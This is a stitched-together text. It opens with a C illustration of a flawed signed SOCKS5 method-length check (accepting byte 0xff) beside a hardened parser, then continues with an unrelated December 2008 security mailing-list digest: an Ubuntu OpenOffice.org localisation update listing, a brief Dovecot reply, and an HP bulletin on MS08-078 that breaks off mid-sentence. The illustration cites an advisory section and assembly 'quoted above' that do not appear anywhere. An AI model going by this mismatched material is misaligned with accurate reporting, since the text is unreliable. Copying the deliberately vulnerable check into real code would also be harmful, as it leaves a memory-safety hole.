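
Added illustration (not part of the original advisory and not Psi's source code): the signed length check described in section III, next to a hardened parser that treats the length byte as unsigned and also verifies that the promised bytes were actually received. All function names are hypothetical; the limit of 10 is taken from the "cmp ecx, 10" check quoted above, and the sample inputs are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SOCKS5_VERSION 0x05
#define MAX_METHODS    10   /* limit from the "cmp ecx, 10" check in the advisory */

/* Flawed check, modelled on the advisory's description: the length byte is
 * sign-extended before the comparison, so 0x80..0xff become negative and
 * pass "len <= 10". Returns 1 if the length would be accepted. */
int length_accepted_signed(const uint8_t *buf, size_t buflen)
{
    if (buflen < 2 || buf[0] != SOCKS5_VERSION)
        return 0;
    int len = (signed char)buf[1];   /* 0xff -> -1 on two's-complement targets */
    return len <= MAX_METHODS;
}

/* Hardened parser: unsigned length, upper bound enforced, and no copy of
 * bytes the peer announced but never sent.
 * Returns the number of bytes copied to out, or -1 if the message is rejected. */
int parse_methods_checked(const uint8_t *buf, size_t buflen,
                          uint8_t *out, size_t outlen)
{
    if (buflen < 2 || buf[0] != SOCKS5_VERSION)
        return -1;
    size_t len = buf[1];             /* always 0..255, never negative */
    if (len > MAX_METHODS || len > outlen)
        return -1;
    if (buflen - 2 < len)            /* announced length exceeds received data */
        return -1;
    memcpy(out, buf + 2, len);
    return (int)len;
}

int main(void)
{
    const uint8_t two_bytes[] = { 0x05, 0xff };          /* constructed: bytes from section III */
    const uint8_t valid[]     = { 0x05, 0x02, 0x00, 0x02 }; /* constructed: well-formed message */
    uint8_t out[MAX_METHODS];

    printf("signed check accepts 0xff: %d\n",
           length_accepted_signed(two_bytes, sizeof two_bytes));
    printf("hardened parser on 0xff:   %d\n",
           parse_methods_checked(two_bytes, sizeof two_bytes, out, sizeof out));
    printf("hardened parser on valid:  %d\n",
           parse_methods_checked(valid, sizeof valid, out, sizeof out));
    return 0;
}
```

The third check in the hardened parser addresses the first failure mode listed in section III, where the copy reads past the data that was actually sent.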


[USN-677-2] OpenOffice.org Internationalization update

2008-12-24 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-677-2  December 23, 2008
openoffice.org-l10n update
https://launchpad.net/bugs/310359
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  openoffice.org-l10n-af  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ar  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-as-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-be-by   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bg  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bn  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-br  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-bs  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ca  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-common  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-cs  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-cy  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-da  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-de  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-dz  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-el  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-en-gb   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-en-za   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-eo  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-es  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-et  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-eu  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fa  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fi  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-fr  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ga  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-gl  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-gu-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-he  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hi-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hr  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-hu  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-it  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ja  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ka  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-km  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-kn  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ko  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ku  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lo  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lt  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-lv  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-mk  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ml-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-mr-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nb  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ne  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nl  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nn  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-nr  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ns  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-or-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pa-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pl  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pt  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-pt-br   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ro  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ru  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-rw  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sk  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sl  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sr  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ss  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-st  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sv  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-sw  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ta-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-te-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tg  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-th  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ti-er   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tn  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-tr  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ts  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-uk  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ur-in   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-uz  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-ve  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-vi  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-xh  1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zh-cn   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zh-tw   1:2.4.1-1ubuntu2.1
  openoffice.org-l10n-zu  1:2.4.1-1ubuntu2.1

In general, a standard system upgrade is sufficient to effect the
necessary changes

Re: rPSA-2008-0341-1 dovecot

2008-12-24 Thread olga
What Dovecot version prior?


[security bulletin] HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-078

2008-12-24 Thread security-alert

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01634640
Version: 1

HPSBST02397 SSRT080187 rev.1 - Storage Management Appliance (SMA), Microsoft 
Patch Applicability MS08-078

NOTICE: The information in this Security Bulletin should be acted upon as soon 
as possible.

Release Date: 2008-12-22
Last Updated: 2008-12-22

Potential Security Impact: Please check the table below

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Various potential security vulnerabilities have been identified in Microsoft 
software that is running on the Storage Management Appliance (SMA). Some of 
these vulnerabilities may be pertinent to the SMA, please check the table in 
the Resolution section of this Security Bulletin.

References: MS08-078 (CVE-2008-4844) 

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Storage Management Appliance v2.1 Software running on: 

Storage Management Appliance I 
Storage Management Appliance II 
Storage Management Appliance III 

BACKGROUND

CVSS 2.0 Base Metrics 
===
Reference Base Vector   Base Score 
 --Not Applicable--
===
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

Patches released by Microsoft after MS06-051 are covered by monthly Security 
Bulletins.

For the full archived list of Microsoft security updates applicable for Storage 
Management Appliance software v2.1, please refer to the following Security 
Bulletins available on the IT Resource Center (ITRC) Web site: 
http://www.itrc.hp.com/service/cki/secBullArchive.do 


For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to 
Security Bulletin HPSBST02146 
For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to 
Security Bulletin HPSBST02147 
For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to 
Security Bulletin HPSBST02148 
For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to 
Security Bulletin HPSBST02140 

The Microsoft patch index archive and further details about all Microsoft 
patches can be found on the following Web site: 
http://www.microsoft.com/technet/security/bulletin/summary.mspx 

Note: The SMA must have all pertinent SMA Service Packs applied 

Windows 2000 Update Rollup 1

Customers are advised to download and install the Windows 2000 Update Rollup 1 
for Service Pack 4 on SMA v2.1. For more information please refer to the 
Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management 
Appliance v2.1 advisory at the following website: 
http://h2.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManual&lang=en&cc=us&docIndexId=179111&taskId=101&prodTypeId=12169&prodSeriesId=315667
 

Windows 2000 Update Rollup 1 for SP4 does not include security updates released 
after April 30, 2005 starting from MS05-026. It also does not include patches 
MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 
Update Rollup 1 for SP4, if they have not been installed already.

RESOLUTION
HP strongly recommends the immediate installation of all security patches that 
apply to third party software which is integrated with SMA software products 
supplied by HP, and that patches are applied in accordance with an appropriate 
patch management policy.

Note: Patch installation instructions are shown at the end of this table. 

 - 
MS Patch - MS08-078 Security Update for Internet Explorer (960714)
Analysis - Possible security issue exists. Patch will run successfully.
Action - For SMA v2.1, customers should download patch from Microsoft and 
install:
Internet Explorer 6 SP1
Or
Internet Explorer 5.01 SP4
To determine your IE version check the IE help page.
 -  

Installation Instructions: (if applicable) 


Download patches to a system other than the SMA 
Copy the patch to a floppy diskette or to a CD 
Execute the patch by using Terminal Services to the SMA or by attaching a 
keyboard, monitor and mouse to the SMA. 

Note: The Microsoft Windows Installer 3.1 is supported on SMA v2.1. For more 
information please refer to the following website: 
http://www.microsoft.com/downloads/details.aspx?FamilyID=889482fc-5f56-4a38-b838-de776fd4138c&hash=SYSSXDF&displaylang=en
 


PRODUCT SPECIFIC INFORMATION 
None 

HISTORY 
Version:1 (rev.1) - 22 December 2008 Initial release 


Third Party Security Patches: Third party security patches that are to be 
installed on systems running HP software products should be applied in 
accordance with the customer's patch management policy. 

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with